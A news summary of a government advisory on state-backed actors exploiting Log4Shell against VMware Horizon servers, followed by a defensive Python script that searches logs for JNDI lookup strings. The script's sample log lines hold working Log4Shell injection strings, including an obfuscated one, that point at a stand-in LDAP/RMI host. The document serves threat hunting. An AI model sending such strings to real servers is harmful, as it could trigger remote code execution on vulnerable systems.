State-sponsored hacking groups and other threat actors have been exploiting the Log4Shell remote code execution flaw, tracked as CVE-2021-44228, in attacks against VMware servers, according to BleepingComputer.
VMware Horizon and Unified Access Gateway servers have been compromised through Log4Shell to obtain initial network access, after which the attackers delivered malware that enabled further payload distribution and the exfiltration of sensitive data, a joint advisory from the Cybersecurity and Infrastructure Security Agency and U.S. Coast Guard Cyber Command warned.
"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data," said the advisory. Both agencies urged organizations with still unpatched VMware servers to consider them compromised and commence threat hunting efforts.
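One concrete place to start the threat hunting the advisory recommends is the logs of any internet-facing service that passes user-controlled fields (request paths, headers, form values) into Log4j. The following is an added example, not code from the advisory, from BleepingComputer, or from VMware: it scans log lines for the `${jndi:` lookup that triggers CVE-2021-44228, and first folds the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that are commonly used to split the literal string across several expressions, so that disguised forms are matched as well as the plain one. The log lines, addresses and paths are constructed for illustration.

```python
import re

# Constructed sample log lines (not taken from the advisory or any real incident).
# They mimic an access log where a user-controlled header ends up in a log4j call.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Dec/2021:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:02:03 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:02:40 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:rmi://203.0.113.10/b}"',
    '10.0.0.7 - - [12/Dec/2021:10:03:11 +0000] "POST /login HTTP/1.1" 302 "curl/7.68"',
    '10.0.0.3 - - [12/Dec/2021:10:04:05 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 "Mozilla/5.0"',
]

# Direct form of the lookup that triggers CVE-2021-44228.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Nested lookups used to hide the literal "jndi": ${lower:x} / ${upper:x}
# evaluate to x, and ${name:-x} evaluates to its default x when "name" is empty.
CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:([^{}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")


def normalize(text: str) -> str:
    """Collapse nested lookups until nothing changes, so disguised forms
    fold back to the plain ${jndi:...} shape the main pattern looks for."""
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(r"\1", text)
        text = DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def is_jndi_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup, directly or after un-nesting."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def find_jndi_probes(lines):
    """Return (index, normalized_line) for every line that contains a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI_LOOKUP.search(norm):
            hits.append((i, norm))
    return hits


if __name__ == "__main__":
    for idx, norm in find_jndi_probes(SAMPLE_LOGS):
        print(f"line {idx}: {norm}")
```

A hit on a server that was unpatched at the time of the request is exactly the case the agencies say to treat as a compromise rather than a blocked probe: the next step is to look for the loader and its outbound C2 connections on that host, not just to patch it. Note that a benign `${date:yyyy}` string in a path is not flagged, and that the normalizer only handles the three nesting forms named above; other Log4j lookups would need their own rules.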